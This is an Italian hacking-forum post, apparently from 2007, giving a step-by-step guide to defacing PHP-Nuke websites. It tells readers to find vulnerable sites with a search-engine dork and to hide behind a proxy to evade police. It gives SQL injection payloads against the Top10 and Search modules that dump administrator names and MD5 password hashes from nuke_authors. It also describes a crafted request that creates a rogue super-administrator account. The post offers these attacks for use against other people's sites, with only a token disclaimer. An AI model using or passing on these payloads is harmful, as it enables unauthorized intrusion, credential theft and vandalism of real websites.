Toggle sidebar
  • Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Defacciare in Php-Nuke By HackerStyler

H

HackerStyler

Utente Medio
Autore del topic
1 Aprile 2007
191
0
Miglior risposta
0
Disclaimer: Io e lo staff del forum non ci assumiamo nessuna responsabilità  degli utenti che usufruiranno della guida a scopo personale, perche il materiale è solo ed unicamente a scopo informativo!

Come defacciare Siti Web fatti in Php-Nuke

Ricordate che quando si fanno queste cose p meglio che siate proxati perche se beccate un sito in phpnuke tosto dove ha pure un SENTINEL appena fate queste cose illegali inviera il vostro ip alla polizia postale e vi denunciera quindi è meglio essere proxati...

Pero ricorda che nel web anche se sei proxati ti possono vedere il tuo ip!

Php nuke
Per defacciare un php nuke possiamo sfruttare alcuni bug (naturalmente se presenti)
Top 10
Come sempre andate su un motore di ricerca e cercate “Powered by Php Nukeâ€￾ e trovato il sito scrivete:
Perfavore, Entra oppure Registrati per vedere i Link!
ION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_autho rs

Se il sito è vulnerabile vi darà  i nick e la pass in Md5. Se il sito vi la pass in Md5 andate in qualche sito che vi trova la pass md5. Ok dopo che hai
Perfavore, Entra oppure Registrati per vedere i Link!

vi loggate con nick che vi aveva torvato prima e la pass NON IN MD5, e poi modificato il sito come volete voi.

Search


Se nn risolvete niente con la top10 andate nel modulo search e scrivete:

www.sitovittima.com/modules.php?name=Searchp0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

Se il sito è vulnerabile vi darà  la passw in md5.

God admin
Se nemmeno il modulo search vi dà  la passw nn vi resta ke provare a diventare Admin. Vi basterà  andare qui :
Perfavore, Entra oppure Registrati per vedere i Link!


Se cm risultato avremo “Selection from the database failed!" siamo dentro . Quindi ci basterà  scrivere:

Perfavore, Entra oppure Registrati per vedere i Link!
=God&add_pwd=VOSTRAPASSW&add_email=foo@bar.com&add _radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

Al posto di VOSTRONICK e VOSTRAPASSW mettete i vostri dati premete invio e avrete creato il vosto Account cm admin (sempre se il sito è vulnerabile) fatto ciಠvi basterà  effettutare il login e sarete dentro!!

Spero di essere stato chiaro. Byeeeeeeeeeee


Mio proverbio:Non si è mai Hacker perche non
si finisce mai di imparare.[Proverbio By Me]
Perfavore, Entra oppure Registrati per vedere i Link!
 
Devi accedere o registrarti per rispondere qui.
 
 
Top
Indietro